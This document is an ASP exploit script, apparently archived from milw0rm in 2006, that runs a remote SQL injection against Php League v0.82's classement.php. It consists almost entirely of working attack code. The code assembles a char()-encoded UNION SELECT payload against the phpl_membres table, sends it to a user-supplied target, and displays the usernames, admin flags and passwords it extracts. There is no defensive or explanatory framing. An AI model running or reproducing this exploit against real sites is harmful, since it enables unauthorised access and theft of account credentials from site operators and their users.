Php League v0.82 (classement.php) Remote SQL Injection Exploit

<% Response.Buffer = True %> <% On Error Resume Next %> <% Server.ScriptTimeout = 100 %> <% '=============================================================================================== '[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit '[Coded by : ajann '[Author : ajann '[Contact : :( '[ExploitName: exploit2.asp '[Note : exploit file name =>exploit2.asp '[Note : If Wrong Id = "CTYPE html PUBLIC..... see" '[Using : Write Target and ID after Submit Click '=============================================================================================== %> Php League v0.82 (classement.php) Remote SQL Injection Exploit Php Leaguev0.82 (classement.php) Remote SQL Injection Exploit

TARGET:Example:[http://x.com/path]

USER ID:Example:[User ID=1]

<% islem = Request.QueryString("islem") If islem = "hata1" Then Response.Write "There is a problem! Please complete to the whole spaces" End If If islem = "hata2" Then Response.Write "There is a problem! Please right character use" End If If islem = "hata3" Then Response.Write "There is a problem! Add ""http://""" End If %> <% If islem = "get" Then string2="/consult/classement.php?champ='" string3="%20union%20select%200,0,concat(char(85),char(115)," string4="char(101),char(114),char(73),char(68),char(58)," string5="id,char(32),char(65),char(100),char(109)" string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85)," string7="char(115),char(101),char(114),char(78),char(97),char(109)," string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115)," string9="char(115),char(58),char(13),char(10),mot_de_passe)" string10="%20from%20phpl_membres%20where" string11="%20id%20like%20" string12=Request.Form("id") string13="/*" targettext = Request.Form("text1") arama=InStr(1, targettext, "union" ,1) arama2=InStr(1, targettext, "http://" ,1) If targettext="" Then Response.Redirect("exploit2.asp?islem=hata1") Else If arama>0 then Response.Redirect("exploit2.asp?islem=hata2") Else If arama2=0 then Response.Redirect("exploit2.asp?islem=hata3") Else %> <% target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13 Public Function take(come) Set objtake = Server.CreateObject("Microsoft.XMLHTTP" ) With objtake .Open "GET" , come, FALSE .sEnd take = .Responsetext End With SET objtake = Nothing End Function get_username = take(target1) getdata=InStr(get_username,"0 0/" ) username=Mid(get_username,getdata+5,90) %> ajann

Data:

<%=username%>

<% End If End If End If End If Set objtake = Nothing %> # milw0rm.com [2006-10-27]